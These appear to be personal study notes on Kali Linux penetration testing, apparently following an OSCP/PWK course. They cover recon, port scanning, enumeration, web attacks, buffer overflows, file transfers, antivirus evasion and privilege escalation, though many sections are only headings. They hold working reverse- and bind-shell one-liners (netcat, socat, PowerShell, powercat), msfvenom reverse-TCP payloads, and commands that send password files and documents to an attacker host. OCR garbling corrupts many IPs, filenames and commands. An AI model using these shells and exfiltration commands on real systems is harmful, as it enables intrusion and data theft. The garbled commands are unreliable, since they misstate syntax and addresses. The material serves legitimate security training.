我的笔记本

The use of kali

1.Searching, Installing, and Removing Tools
1.1 apt update
After the apt database has been upated,we can upgrade the installed packages and core system
to latest versions using the apt upgrade command.
Search:apt-cache search application-name
1.2 apt install
The apt install command can be used to add a package to the system with apt install
1.3 apt remove --purge
The apt remove -purge command completely removes packages from Kali.
ex:sudo apt remove --purge pure-ftpd
1.4 dpkg
ex:sudo dpkg -i man-db_2.1.e.2-s_amd64.deb

2.Practical Tools
2.1 Netcat
2.1.1 Connecting to a TCP/UDP Port[client]
 Check if a port is open or closed.
 Read a banner from the service listening on a port
 Connect to a network service manually
 ex:nc -nv 10,11,8,22 118
 -n:option to skip DNS name resolution;
 -v:to add some verbosity;

2.1.2 Listening on a TCP/UDP Port[server]
 ex:nc -nlvp 4444
 -n: disable DNS name resolution,
 -l:create a listener,
 -v: add some verbosity
 -p: to specify the listening port number

2.1.3 Transferring Files with Netcat
 On the Windows machine, we will set up a Netcat listener on port 4444 and redirect any output into a file called incoming.exe:
 nc - nlvp 4444 > incoming.exe
 On the Kali system, we will push the wget.exe file to the Windows machine through TCP port 4444:
 kali@kali:-$ locate wget. exe
 /usr/share/windows-resources/binaries/wget.exe
 kali@kali:-$ nc -nv 10.11.0.22 4444 < /usr/share/windows-resources/binaries/wget.exe
 The connection is received by Netcat on the Windows machine
2.1.4 Reverse Shell Scenario
 C:\Users\offsec> nc - nlvp 4444 client
 kali@kali:-$ nc -nv 10.11.e.22 4444 -e /bin/bash
 win listen to its 4444 port , and kali send its bash to win port 4444,if success win can input the command and it will send to kali excute it .

2.2 Socat
 2.2.2 Socat File Transfers
 kali@ka1i:~$ sudo socat TCP4-LISTEN:443,fork file:secret_passwords.txt #give the file to port 443
 C:\Users\offsec> socat TCP4:18.11.8.4:443 fi\e:received_secret_passwords.txt,create #connect to the port and get the file

2.2.3 Socat Reverse Shells
 C:\Users\offsec> socat -d -d TCP4-LISTEN:443 STDOUT
 kali@kali:~$ socat TCP4:18.11.8.22:443 EXEC:/bin/bash
 kali send the bash to the remote meachine

2.2.4 Socat Encrypted Bind Shells
 use the openssl. application to create a selfsigned certificate using the following options:
 req: initiate a new certificate signing request
 -newkey: generate a new private key
 rsa:2848: use RSA encryption with a 2,048-bit key length.
 -nodes: store the private key without passphrase protection
 -keyout: save the key to a file
 -xse9: output a self-signed certificate instead of a certificate request
 -days: set validity period in days
 -out: save the certificate to a file
 kali@kali :~$ opensst req -newkey rsa:2848 -nodes - keyout bind_shett.key - x589 -days 36
 2 -out bind_she\t.crt
 Once we generate the key, we will cat the certificate and its private key into a file, which we will eventually use to encrypt our bind shell.
 kali@kali:~$ cat bind_shett.key bind_shett.crt > bind_shett.pem
 kali@kali:~$ sudo socat OPENSSL-LISTEN:443,cert=bind_shett.pem,verify=e,fork EXEC:/bin/bash
 C:\Users\offsec> socat - OPENSSL:1e.11. e .4:443,verify=8

2.3 PowerShell and Powercat
 PowerShell maintains an execution policy that determines which type of PowerShell scripts (if any)
 can be run on the system. The default policy is "Restricted", which effectively means the system
 will neither load PowerShell configuration files nor run PowerShell scripts. For the purposes of this
 module, we will need to set an ·unrestricted» execution policy on our Windows cl ient machine.When presented with a User Account Control prompt, select Yes and
 enterSet-ExecutionPolicy Unrestricted:
 C:\WINDOWS\system32> Set-ExecutionPolicy Unrestricted
 C:\WINDOWS\system32> Get-ExecutionPolicy
2.3.1 PowerShe/1 File Transfers
 C: \Users\offsec> powershett -c "(new-object System.Net.WebCtient).DowntoadFite('http:/
 /18.11.8.4/wget.exe','C:\Users\offsec\Desktop\wget.exe')
2.3.2 PowerShell Reverse Shells
 C: \Users\offs ec> powershell -c "$client= New-Object System.Net.Sockets.TCPC1ient( 1 18.
 11.e.4',443);$stream = $client.GetStream(); [byte []]$bytes = e •• 6SS3Sl%{8};while(($i =
 $stream.Read($bytes, a, $bytes.Length)) -ne 8){;$data = (New-Object -TypeName System.T
 ext.ASCIIEncoding).GetString($bytes,e, $i);$sendback = (iex $data 2>&1 I Out-String);
 $sendback2 = $sendback + 'PS ' + (pwd).Path + '> 1 ;$sendbyte = ([text.encoding]::ASCII
 ).GetBytes($sendback2);$stream.Write($sendbyte,e,$sendbyte.Length);$stream.Flush()};$c
 lient.Close()"
 kali@kali:~$ sudo nc -lnvp 443
2.3.4 Powercat
 Powercat is essentially the PowerShell version of Netcat written by besimorhino. It is a script we
 can download to a Windows host to leverage the strengths of PowerShell and simplifies the
 creation of bind/reverse shells.
2.3.5 Powercat File Transfers
 kali@kali:~$ sudo nc -lnvp 443 > receiving_powercat.psl
 powercat -c 10,11,8,4 -p 443 -i C:\Users\ Offsec\ powercat.ps1
2.3.6 Powercat Reverse Shells
 kali@kali:~$ sudo nc -lvp 443
 C:\Users\offsec> powercat -c 10,11.0.4 -p 443 -e cmd.exe
2.3.7 Powercat Bind Shells
 C:\Users\offsec> powercat -l -p 443 -e cmd.exe
 kali @kali:-$ nc 18.11, 8,22 443
2.4 Wireshark
2.4.1 Wireshark Basics
 Wireshark uses Libpcap (on Linux) or Winpcap (on Windows) libraries in order to capture
 packets from the network.

2.5 Tcpdump

3.Bash Scripting


4.Passive Information Gathering(被动信息收集)
4.1 Taking Notes
 An information gathering campaign can generate a lot of data, and it's important that we manage
 that data well so that we can leverage it in further searches or use it in a later phase. There is no
 right or wrong way to take notes. However, we may find it easier to retrieve information later on if
 we keep detailed and wel l formatted notes.
4.2 Website Recon
 If the client has a website, we can gather basic information by simply browsing the site.
4.3 Whois Enumeration
 Whois 139 is a TCP service, tool, and a type of database that can provide information about a domain
 name, such as the name server and registrar. 141 This information is often public since registrars
 charge a fee for private registration.
 ka1i@kali:-$ whois megacorpone.com
4.4 Google Hacking
 For example, to find interesting, non-HTML pages, we can use site:megacorpone.com to limit the
 search to megacorpone.com and subdomains, followed by -filetype:html to exclude HTML
 pages from the results:
4.5 Netcraft
4.6 Recon-ng (operation like metasploit)
 Recon-ng is a module-based framework for web-based information gathering. Recon-ng displays
 the results of a module to the terminal but it also stores them in a database. Much of the power of
 recon-ng lies in feeding the results of one module into another, allowing us to quickly expand the
 scope of our information gathering
 kali@kali:-$ recon-ng
 We can add modules from the recon-ng "Marketplace". We'll search the marketplace from the
 main prompt with marketplace search, providing a search string as an argument.
 In this example, we will search for modules that contain the term gi thub:
 recon-ng][default] > marketplace search github
 use google module get the host domain name and use resolve to get ip address
 [recon-ng][default] > modules load recon/domains-hosts/google_site_web
 [recon-ng) [default] [google_site_web] > options set SOURCE megacorpone.com
 [recon-ng][default][google_site_web] > run
 [recon-ng)[default) > marketplace info recon/hosts-hosts/resolve
 [recon-ng][default] > marketplace install recon/hosts-hosts/resolve
 [recon-ng][default] > modules toad recon/hosts-hosts/resolve
4.7 Open-Source Code
 In the following sections, we will discuss various online tools and resources that can be used to
 passively search for information. One such source of interesting information are open-source
 projects and online code repositories, such as GitHub Gitlab and SourceForge.
4.8 Shodan
 search for hostnanae :rNgacor-pone.com
4.9 Security Headers Scanner
4.10 SSL Server Test
4.11 Pastebin
4.12 User Information Gathering
 4.12.1 Email Harvesting
 kali@kali:~$ theharvester -d megacorpone.com -b google
 We found some email addresses, one of which, •first@megacorpone.com·, appears to be new to
 us. We have also found some new subdomains of megacorpone.com. Let's add these to our notes
 as well.
 4.12.2 Password Dumps
4.13 Social Media Tools
4.13.1 Social-Searcher
4.13.2 Site-Specific Tools
4.15 Information Gathering Frameworks
4.15.1 OSINT Framework
4.15.2 Maltego
 Maltego searches thousands of online data sources, and uses extremely clever tttransforms» to
 convert one piece of information into another. For example, if we are performing a user information
 gathering campaign, we could submit an email address, and through various automated searches,
 "transform· that into an associated phone number or street address. During an organizational
 information gathering exercise, we could submit a domain name and "transform· that into a web
 server, then a list of email addresses, then a list of associated social media accounts, and then into
 a potential password list for that email account.

5. Active Information Gathering
5.1 DNS Enumeration
5.1.1 Interacting with a DNS Server
 Each domain can use different types of DNS records. Some of the most common types of DNS
 records include:
 NS- Nameserver records contain the name of the authoritative servers hosting the DNS
 records for a domain.
 A -Also known as a host record, the ·a record" contains the IP address of a hostname (such
 as www.megacorpone.com).
 MX - Mail Exchange records contain the names of the servers responsible for handling email
 for the domain. A domain can contain multiple MX records.
 PTR - Pointer Records are used in reverse lookup zones and are used to find the records
 associated with an IP address.
 CNAME - Canonical Name Records are used to create aliases for other host records.
 TXT- Text records can contain any arbitrary data and can be used for various purposes,
 such as domain ownership verification.
 To demonstrate this, we'll use the host command to find the IP address of
 www.megacorpone.com:
 kali @kali:~$ host www.megacorpone.com
 kali @kali:~$ host -t mx megacorpone.com
 kali@kali:~$ host -t txt megacorpone.com 域名txt记录
5.1.2 Automating Lookups
 kali@kali:~$ for ip in $ (cat list.txt) ; do host $i p.megacorpone.com; done
5.1.3 Reverse Lookup Brute Force(反向解析获取信息)
 for ip in $ (seq 58 108) ; do host 38.108.193.$ip; done I grep -v "not found"
5.1.5 DNS Zone Transfers
 A zone transfer is basically a database replication between related DNS servers in which the zone
 file is copied from a master DNS server to a slave server. The zone file contains a list of all the DNS
 names configured for that zone. Zone transfers should only be allowed to authorized slave DNS
 servers but many administrators misconfigure their DNS servers, and in these cases, anyone asking
 for a copy of the DNS server zone will usually receive one.
 The host command syntax for performing a zone transfer is as follows:
 host -1 《domain name》 《dns server address/>
 kali@kali:-$ host-\ megacorpone.com ns2.megacorpone.com
5.1.6 Relevant Tools in Kali Linux
5.1.6.1 DNSRecon
 DNSRecon193 is an advanced, modern DNS enumeration script written in Python. Running
 dnsrecon against megacorpone.com using the -d option to specify a domain name, and -t to
 specify the type of enumeration to perform (in this case a zone transfer), produces the following
 output:
 kali@kali:-$ dnsrecon -d megacorpone.com -t axfr
5.1.6.2 DNSenum
 kali@kali:~$ dnsenum zonetransfer.me
5.2 Port Scanning
 Port scanning is the process of inspecting TCP or UDP ports on a remote machine with the intention
 of detecting what services are running on the target and what potential attack vectors may exist.
5.2.1 TCP I UDP Scanning
5.2.1.1. TCP Scanning
 To illustrate this, we will run a TCP Netcat port scan on ports 3388-3390. The -w option specifies
 the connection timeout in seconds and -z is used to specify zero-1/0 mode, which will send no data
 and is used for scanning:
 kali@kali:-$ nc -nvv -w 1 -z 10.11.1.220 3388-3390
5.2.1.2 UDP Scanning
 Let's run a UDP Netcat port scan against ports 160-162 on a different target. This is done using the
 only nc option we have not seen yet, -u, which indicates a UDP scan:
 kali@kali:-$ nc -nv -u -z - w 1 10.11.1.115 160-162
 if the destination UDP port is closed, the target should respond with an ICMP port unreachable
5.2.2 Port Scanning with Nmap
 A default Nmap TCP scan will scan the 1000 most popular ports on a given machine.
 kali@kali:~$ nmap -p 1-65535 10.11.1.220
 A similar local port scan explicitly probing all 65535 ports generated about 4 MB of traffic
5.2.2.2 Stealth I SYN Scanning
 kali@kali:~$ sudo nmap -ss 10.11.1.220
 Because the three-way handshake is never completed, the information is not passed to the
 application layer and as a result, will not appear in any application logs. A SYN scan is also faster
 and more efficient because fewer packets are sent and received.
5.2.2.3 TCP Connect Scanning
 There might be times when we need to specifically perform a connect scan with nmap, for example,
 when scanning via certain types of proxies. We use the -sT option to start a connect scan:
 kali @kali:~$ nmap -sT 10 .11.1.220
5.2.2.4 UDP Scanning
 When performing a UDP scan,202 Nmap will use a combination of two different methods to
 determine if a port is open or closed. For most ports, it will use the standard "ICMP port
 unreachable" method described earlier by sending an empty packet to a given port. However, for
 common ports, such as port 161, which is used by SNMP, it will send a protocol-specific SNMP
 packet in an attempt to get a response from an application bound to that port. To perform a UDP
 scan, the -su option is used and sudo is required to access raw sockets:
 ka1i@kali:~$ sudo nmap -sU 10.11.1.115
 The UDP scan (-su) can also be used in conjunction with a TCP SYN scan (-ss) option to build a
 more complete picture of our target:
 kali@kali:~$ sudo nmap -ss -su 10.11.1.115
5.2.2.5 Network Sweeping
 To deal with large volumes of hosts, or to otherwise try to conserve network traffic, we can attempt
 to probe targets using Network Sweeping techniques
 kali@kali:~$ nmap -sn 10 . 11.1.1-254
 Searching for live machines using the grep command on a standard nmap output can be
 cumbersome. Instead, let's use Nmap's ·greppable· output parameter, -oG, to save these results
 into a format that is easier to manage
 kal i@kali:~$ nmap -v -sn 10.11.1.1-254 -oG ping-sweep.txt
 kali@kali:~$ grep Up ping-sweep.txt | cut -d " " -f 2
 To save time and network resources, we can also scan multiple IPs, probing for a short list of
 common ports. For example, let's conduct a TCP connect scan for the top twenty TCP ports with
 the --top-ports option and enable OS version detection, script scanning, and traceroute with -A:
 kali@kali:~$ nmap -sT -A --top-ports=20 10.11.1.1-254 -oG top-port-sweep.txt
5.2.2.6 OS Fingerprinting
 kali@kali:~$ sudo nmap -o 10.11.1.228
5.2.2.7 Banner Grabbing/Service Enumeration
 inspecting service banners (-sv) and
 running various OS and service enumeration scripts (-A) against the target
 kali @kali:~$ nmap -sV -sT -A 10.11.1.228
5.2.2.8 Nmap Scripting Engine (NSE)
 use the Nmap Scripting Engine (NSE)to launch user-created scripts in order to automate
 various scanning tasks. These scripts perform a broad range of functions including DNS
 enumeration, brute force attacks, and even vulnerability identification. NSE scripts are located in
 the /usr/share/nmap/scripts directory.
 kali@kali:~$ nmap 10.11.1.220 --script=smb-os-discovery
 Another useful (and self-explanatory) NSE script is dns-zone-transfer:
 kali@kali:~$ nmap --script=dns-zone-transfer -p 53 ns2.megacorpone.com
 To view more information about a script we can use the --script-help option:
 kali @kali:~$ nmap --script- help dns-zone-transfer
5.2.3 Masscan
 Masscan is arguably the fastest port scanner; it can scan the entire Internet in about 6 minutes.
 transmitting an astounding 1 O mi Ilion packets per second! While it was originally designed to scan
 the entire Internet, it can easily handle a class A or B subnet, which is a more suitable target range
 during a penetration test.
 kali@kali:~$ sudo apt install masscan
 Import:: This command is NOT to be tried in the PWK internal lab network as you will be scanning subnets you are not allowed to.
 kali@kali:~$ sudo masscan -pse 10.0.0.0/8
 To try masscan on a class C subnet in the PWK internal lab network, we can use the following
 example. We will add a few additional masscan options, including --rate to specify the desired
 rate of packet transmission, -e to specify the raw network interface to use, and --router-ip to
 specify the IP address for the appropriate gateway:
 kali@kali:~$ sudo masscan -pse 10.11.1.8/ 24 --rate=1888 -e tape --router-ip 10.11.0.1
5.3 SMB Enumeration
5.3.1 Scanning for the NetBIOS Service
 kali@kali:-$ nmap -v -p 139,445 -oG smb.txt 10.11,1,1-254
 kali@kali:-$ sudo nbtscan -r 18,11,1.8/24
5.3.2 Nmap SMB NSE Scripts
 kali @kali:-$ ls -1 /usr/share/nmap/scripts/smb*
 kali@kali :~$ nmap -v -p 139, 445 --s c ript=smb-os-discovery 10.11.1.227
 kali@kali:~$ nmap - v -p 139,445 --script=smb-vutn-ms88-867 --script-args=unsafe=l 10.11.1.5
5.4 NFS Enumeration
5.4.1 Scanning for NFS Shares
 Both Portmapper214 and RPCbimfl15 run on TCP port 111. RPCbind maps RPC services to the ports
 on which they listen.
 kali@kali:~$ nmap -v -p 111 10.11.1.1-254
 We can use NSE scripts like rpcinfo to find services that may have registered with rpcbind:
 kal i@kali:~$ nmap -sV -p 111 --script=rpcinfo 18.11.1.1-254
5.4.2 Nmap NFS NSE Scripts
 kali@kali: ~$ ts -1 /usr/share/nmap/scripts/nfs*
 kali@kali:~$ nmap -p 111 --script nfs* 10.11.1.12
5.5 SMTP Enumeration
 kali@ka1i:~$ nc -nv 10.11.1.211 25
5.6 SNMP Enumeration
5.6.1 The SNMP Mib Tree
 The SNMP Management Information Base (MIB) is a database containing information usually
 related to network management. The database is organized like a tree. where branches represent
 different organizations or network functions. The leaves of the tree (final endpoints) correspond to
 specific variable values that can then be accessed, and probed, by an external user. The IBM
 Knowledge Center217 contains a wealth of information about the MIB tree.
5.6.2 Scanning for SNMP
 To scan for open SNMP ports, we can run nmap as shown in the example that follows. The -su
 option is used to perform UDP scanning and the --open option is used to limit the output to only
 display open ports:
 kali@kali:~$ sudo nmap -su --open -p 161 19,11,1,1-254 -oG open-snmp.txt
 , we can use a tool such as onesixtyone,218 which wi ll attempt a brute force attack
 against a list of IP addresses. First we must build text files containing community strings and the
 IP addresses we wish to scan:
 kali@kali:~$ echo public > community
 kali @kali: ~$ echo private>> community
 kali @kali:-$ echo manager >> community
 kali@kali:~$ for ip in $(seq 1 254); do echo 10.11.1.$ip; done > ips
 kali@kali:~$ onesixtyone - c community -i ips
 Once we find SNMP services. we can start querying them for specific MIB data that might be
 interesting.
5.6.3 Windows SNMP Enumeration Example
5.6.3.1 Enumerating the Entire M/8 Tree
 Using some of the MIB values provided in Listing 268, we can attempt to enumerate their
 corresponding values. Try out the following examples against a known machine in the labs, which
 has a Windows SNMP port exposed with the community string "public". This command
 enumerates the entire MIB tree using the -c option to specify the community string, and -v to
 specify the SNMP version number as well as the -t 10 to increase the timeout period to 10
 seconds:
 kali@kali:~$ snmpwalk -c public -v1 -t 18 10.11.1.14
5.6.3.2 Enumerating Windows Users
 kali@kali:~$ snmpwalk -c public -v1 10.11.1.14 1.3.6.1.4.1.77.1.2.25
5.6.3.3 Enumerating Running Windows Processes
 kali@kali:~$ snmpwalk -c public -v1 10.11.1.73 1.3.6.1.2.1.25.4.2.1.2
5.6.3.4 Enumerating Open TCP Ports
 kali@kali:~$ snmpwalk -c public -v1 10.11.1.50 1.3.6.1.2.1.25.6.3.1.2

8.Vulnerability Scanning
8.1 How Vulnerability Scanners Work
 1. Detect if a target is up and running.
 2. Conduct a full or partial port scan, depending on the configuration.
 3. Identify the operating system using common fingerprinting techniques.
 4. Attempt to identify running services with common techniques such as banner grabbing,
 service behavior identification, or file discovery.
 5. Execute a signature-matching process to discover vulnerabilities
8.2 Vulnerability Scanning with Nessus
8.2.1 Installing Nessus
 kali@kali:~$ sudo apt update && sudo apt upgrade
 kali@kali:-/nessus$ sha256sum Nessus-X.X.X.deb
 kali@kali:~/nessus$ sudo apt install ./Nessus-x.x.X.deb
 kali@kali:~/nessus$ sudo /etc/init.d/nessusd start
8.2.2 Defining Targets
 Nessus supports a number of scan types, including:
 Basic Network Scan: Generic scan with various checks that are suitable to be used against
 various target types.
 Credentialed Patch Audit: Authenticated scan that enumerates missing patches.
 Web Application Tests: Specialized scan for discovering published vulnerabilities in Web
 Applications.
 Spectre and Meltdown: Targeted scan for the Spectre and Meltdown vulnerabilities.
8.2.3 Configuring Scan Definitions
 Some things to consider when configuring the
 Basic Network Scan template include:
 1. Are our targets located on an internal network or are they publicly accessible?
 2. Should the scanner attempt to brute force user credentials?
 3. Should the scanner scan all TCP and UDP ports or only common ports?
 4. Which checks should the scanner run and which ones should it avoid?
 5. Should the scanner run an Authenticated Scan or an Unauthenticated Scan?
8.2.4 Unauthenticated Scanning With Nessus
8.2.5 Authenticated Scanning With Nessus
8.2.6 Scanning with Individual Nessus Pfugins
8.3 Vulnerability Scanning with Nmap
As an alternative to Nessus, we can also use the Nmap Scripting Engine (NSE)235 to perform
automated vulnerability scans.
use the NSE to detect a vulnerability. For this example, we will use --script vuln to
run all scripts in the "vuln" category against a target in the PWK labs:
kal i@kali:-$ sudo nmap --script vuln 10.11.1.10

9.Web Application Attacks
9.3 Web Application Assessment Tools
9.3.2 DIRB
DIRB is a web content scanner that uses a wordlist to find directories and pages by issuing
requests to the server. DIRB can identify valid web pages on a web server even if the main index
page is missing.
Let's run DIRB on www.megacorpone.com. We will supply several arguments: the URL to scan, -r
to scan non-recursively, and -z 1e to add a 10 millisecond delay to each request:
kali@kali: ~$ dirb http: //www. megacorpone. com -r -z 18
9.3.3 Burp Suite
Burp Suite is a GUI-based collection of tools geared towards web application security testing,
arguably best-known as a powerful proxy tool. While the free Community Edition mainly contains
tools used in manual testing, the commercial versions include additional features, including a
formidable web application vulnerability scanner. Burp Suite has an extensive feature list and is
worth investigation, but we will only explore a few basic functions in this section. Please note that
while Burp Suite Professional is prohibited during the OSCP exam, it is also not necessary.
9.3.4 Nikto
Nikto is a highly configurable Open Source web server scanner that tests for thousands of
dangerous files and programs, vulnerable server versions and various server configuration issues.
It performs well, but is not designed for stealth as it will send many requests and embed information
about itself in the User-Agent header.
kali@kali:~$ nikto -host=http: //www.megacorpone.com -maxtime=30s

9.4 Exploiting Web-based Vulnerabilities
9.4.1 Exploiting Admin Consoles
Once we've located an admin
console, the simplest "exploit" is to just log into it. We may attempt default username/password
pairs, use enumerated information to guess working credentials, or attempt brute force.
9.4.1.2 Burp Suite Intruder

9.4.2 Cross-Site Scripting (XSS)
9.4.2.1 Identifying XSS Vulnerabilities
9.4.2.2 Basic XSS
9.4.2.3 Content Injection
9.4.2.4 Stealing Cookies and Session Information
9.4.2.6 Other XSS Attack Vectors

9.4.3 Directory Traversal Vulnerabilities
9.4.3.1 Identifying and Exploiting Directory Traversals

9.4.4 File Inclusion Vulnerabilities
9.4.4.1 IdentifyingFileInclusionVulnerabilities
9.4.4.2 Exploiting Local File Inclusion (LFI)
9.4.4.3 Contaminating Log Files(污染日志文件)
9.4.4.4 LFI Code Execution
9.4.4.6 RemoteFileInclusion(RFI)
9.4.4.9 PHP Wrappers(封装)

9.4.5 SOL Injection
9.4.5.1 Basic SOL Syntax(语法)
9.4.5.2 Identifying SQL Injection Vulnerabilities
9.4.5.3 Authentication Bypass(绕过认证)
9.4.5.5 Enumerating the Database
9.4.5.6 Column Number Enumeration
9.4.5.7 Understanding the Layout of the Output
9.4.5.8 Extracting Data from the Database
9.4.5.10 From SQL Injection to Code Execution
9.4.5.12 Automating SQL Injection(sqlmap)

10. Introduction to Buffer Overflows
10.1 Introduction to the x86 Architecture
To understand how memory corruptions occur and how they can be leveraged into unauthorized access, we need to discuss program memory, understand how software works at the CPU level, and outline a few basic definitions
10.1.1 Program Memory
10.1.1.1 The Stack
10.1.1.2 Function Return Mechanics
10.1.2 CPU Registers
10.1.2.1 General Purpose Registers
10.1.2.2 ESP - The Stack Pointer
10.1.2.3 EBP - The Base Pointer
10.1.2.4 EIP - The Instruction Pointer

10.2 Buffer Overflow Walkthrough(缓冲区溢出演练)
10.2.1 Sample Vulnerable Code
10.2.2 Introducing the Immunity Debugger
10.2.3 Navigating Code
10.2.4 Overflowing the Buffer

11. Windows Buffer Overflows
11.1 Discovering the Vulnerability
11.1.1 Fuzzing the HTTP Protocol
11.2 Win32 Buffer Overflow Exploitation
11.2.1 A Word About DEP, ASLR, and CFG
11.2.2 Replicating the Crash
11.2.3 Controlling EIP
11.2.4 Locating Space for Our Shellcode
11.2.5 Checking for Bad Characters
11.2.6 Redirecting the Execution Flow
11.2.7 Finding a Return Address
11.2.8 Generating Shellcode with Metasploit
kali@kali:-$ msfvenom -p windows/shett_reverse_tcp LHOST=18.11.8.4 LPORT=443 -f c
11.2.9 Getting a Shell

12. LinuxBufferOverflows
12.1 About DEP, ASLR, and Canaries
12.2 Replicating the Crash
12.3 Controlling EIP
12.4 Locating Space for Our Shellcode
12.5 Checking for Bad Characters
12.6 Finding a Return Address
12.7 Getting a Shell

13. Client-Side Attacks
13.1 Know Your Target
13.1.1 Passive Client Information Gathering
13.1.2 Active Client Information Gathering
13.1.2. 1 Social Engineering and Client-Side Attacks
13.1.2.2 Client Fingerprinting
13.2 Leveraging(利用) HTML Applications
13.2.1 Exploring HTML Applications
13.2.2 HTA Attack in Action
13.3 Exploiting Microsoft Office
13.3.2 Microsoft Word Macro
The Microsoft Word macro may be one the oldest and best-known client-side software attack vectors.
13.3.3 Object Linking and Embedding(对象链接和嵌入)
13.3.4 Evading(规避) Protected View

14. Locating Public Exploits
In this module, we will focus on various online resources that host exploits for publicly known vulnerabilities.
14.1 A Word of Caution
14.2 Searching for Exploits
14.2.1 Online Exploit Resources
14.2.1.1 The Exploit Database
14.2.1.2 Security Focus Exploit Archives
14.2.1.3 Packet Storm
14.2.1.4 Google Search Operators

14.2.2 Offline Exploit Resources
14.2.2.1 SearchSploit
kali@kali:~$ sudo apt update && sudo apt install exploitdb
kali@kali:~$ searchsptoit
kali@kali:~$ searchsptoit remote smb microsoft windows
14.2.2.2 Nmap NSE Scripts
kali@kali:~$ cd /usr/share/nmap/scripts
kali@kali:/usr/share/nmap/scripts$ grep Exploits •.nse
14.2.2.3 The Browser Exploitation Framework (BeEF)
14.2.2.4 The Metaspfoit Framework
Metasploit376 is an excellent framework built to assist in the development and execution of exploits. This framework is available in Kali Linux by default and can be started with the msfconsole command:
kali@kali:~$ sudo msfconsote -q

15. Fixing Exploits
Writing an exploit from scratch can be difficult and time-consuming. But it can be equally difficult and time-consuming to find a public exploit that fits our exact needs during an engagement. One great compromise is to modify a public exploit to suit our specific needs.
15.1 Fixing Memory Corruption Exploits
15.1.1 Overview and Considerations
The general flow of a standard stack overflow (in applications running in user mode without mitigations such as DEP and ASLR) is fairly straight-forward. The exploit will:
 1.Create a large buffer to trigger the overflow.
 2.Take control of EIP by overwriting a return address on the stack by padding the large buffer
 with an appropriate offset.
 3.Include a chosen payload in the buffer prepended by an optional NOP sled.
 4.Choose a correct return address instruction such as JMP ESP (or different register) in order to redirect the execution flow into our payload.
15.1.2 Importing and Examining the Exploit
15.1.3 Cross-Compiling Exploit Code
15.1.4 Changing the Socket Information
15.1.5 Changing the Return Address
15.1.6 Changing the Payload
15.1.7 Changing the Overflow Buffer

15.2 Fixing Web Exploits
When modifying web exploits, there are several key questions we generally need to ask while approaching the code:
Does it initiate an HTTP or HTTPS connection?
Does it access a web application specific path or route?
Does the exploit leverage a pre-authentication vulnerability?
If not, how does the exploit authenticate to the web application?
How are the GET or POST requests crafted to trigger and exploit the vulnerability?
Does it rely on default application settings (such as the web path of the application) that may have been changed after installation?
Will oddities such as self-signed certificates disrupt the exploit?
15.2.2 Selecting the Vulnerability
15.2.3 Changing Connectivity Information
15.2.4 Troubleshooting the "index out o f range" Error

16. File Transfers
16.1 Considerations and Preparations
16.1.1 Dangers of Transferring Attack Tools
In some cases, we may need to transfer attack tools and utilities to our target. However,
transferring these tools can be dangerous for several reasons.
First, our post-exploitation attack tools could be abused by malicious parties, which puts the client's resources at risk. It is extremely important to document uploads and remove them after the assessment is completed.
Second, antivirus software, which scans endpoint filesystems in search of pre-defined file signatures,becomesahugefrustrationforusduringthisphase.This software,which isubiquitous in most corporate environments, will detect our attack tools, quarantine them (rendering them useless}, and alert a system administrator.
16.1.2 Installing Pure-FTPd
kali@kali:~$ sudo apt update && sudo apt install pure-ftpd
16.1.3 The Non-Interactive(非交互) Shell
we are not receiving any feedback in our shell.
Most Netcat-Hke tools provide a non-interactive sheII, which means that programs that require user input such as many file transfer programs or su and sudo tend to work poorly, if at all. Non- interactive shells also lack useful features like tab completion and job control.
16.1.3.7 Upgrading a Non-Interactive Shell
16.2 Transferring Files with Windows Hosts
16.2.1 Non-Interactive FTP Download
C:\Users\offsec> ftp -h
C:\Users\offsec> ftp -v -n -s:ftp.txt
16.2.2 Windows Downloads Using Scripting Languages
We can run this (with cscript) to download files from our Kali machine:
C:\Users\Offsec> cscript wget.vbs http://18.11.8,4/evi\.exe evi\.exe
Now we can use PowerShell to run the script and download our file.
C:\Users\Offsec> powershell.exe -ExecutionPolicy Bypass -Nologo -Nonlnteractive -NoPro file -File wget.psl
16.2.3 Windows Downloads with exe2hex and PowerShell
16.2.4 Windows Uploads Using Windows Scripting Languages
C: \Users\Offsec> powershett (New-Object System.Net.WebCtient).UptoadFite( 1 http://10.11.0.4/uptoad.php', 'important.docx')
16.2.5 Uploading Files with TFTP
kali@kali:~$ sudo apt update && sudo apt instatt atftp
kali@kali:~$ sudo mkdir /tftp
kali @kali:-$ sudo chown nobody: / tftp
kali@kali:~$ s udo atftpd --daemon --port 69 / tftp
C:\Users\Offsec> tftp -i 18.11.8.4 put important.docx

17. Antivirus Evasion
17.1 What is Antivirus Software
Antivirus (AV) is type of application designed to prevent, detect, and remove malicious software.404 It was originally designed to simply remove computer viruses. However, with the development of other types of malware, antivirus software now typically includes additional protections such as firewalls, website scanners, and more.
17.2 Methods of Detecting Malicious Code
In order to demonstrate the effectiveness of various antivirus products, we will start by scanning a popular Meterpreter payload. Using msfvenom, we will generate a standard Portable Executable file containing our payload, in this case a simple TCP reverse shell.
17.2.1 Signature-Based Detection(特征库检测)
17.2.2 Heuristic and Behavioral-Based Detection(启发式基于行动检测)
17.3 Bypassing Antivirus Detection
Generally speaking, antivirus evasion falls into two broad categories: on-disk and in-memory.
17.3.1 On-Disk Evasion
17.3.1.1 Packers
Modern on-disk malware obfuscation can take many forms. One of the earliest ways of avoiding detection involved the use of packers
17.3.1.2 Obfuscators
17.3.1.3 Crypters(加密程序)
17.3.1.4 Software Protectors
17.3.2 In-Memory Evasion
17.3.2.7 Remote Process Memory Injection
17.3.2.2 Reflective DLL Injection
17.3.2.3 Process Hollowing
When using process hollowing to bypass antivirus software, attackers first launch a non- malicious process in a suspended state. Once launched, the image of the process is removed from memory and replaced with a malicious executable image. Finally, the process is t hen resumed and malicious code is executed instead of the legitimate process.
17.3.2.4 lnline hooking
17.3.3 AV Evasion: Practical Example
we will install Avira Free Antivirus Version 15.0.34.16 on our Windows 10 client. The Avira installer can be found in the C:\Tools\antivirus_evasion\ directory. Once installed, we can check its configuration by searching for #Start Avira Antivirus• in the Windows 10 search bar:
17.3.3.1 PowerShell ln-Memory Injection
kali@kali:-$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=18.11.8.4 LPORT=4444 -f powershell
17. 3.3.3 Shellter

18. Privilege Escalation
During a penetration test, we often gain an initial foothold on a system as a standard or non- privileged user. In these cases, we generally seek to gain additional access rights before we can demonstrate the full impact of the compromise. This process is referred to as Privilege escalation and it is a necessary skill as "direct-to-root· compromises are arguably rare in modern environments.
18.1 Information Gathering
18.1.1 Manual Enumeration
18.1.1.1 Enumerating Users
C:\Users\student>net user
student@debian:-$ cat /etc/passwd
18.1.1.2 Enumerating the Hostname
C:\Users\student>hostname
18.1.1.3 Enumerating the Operating System Version and Architecture
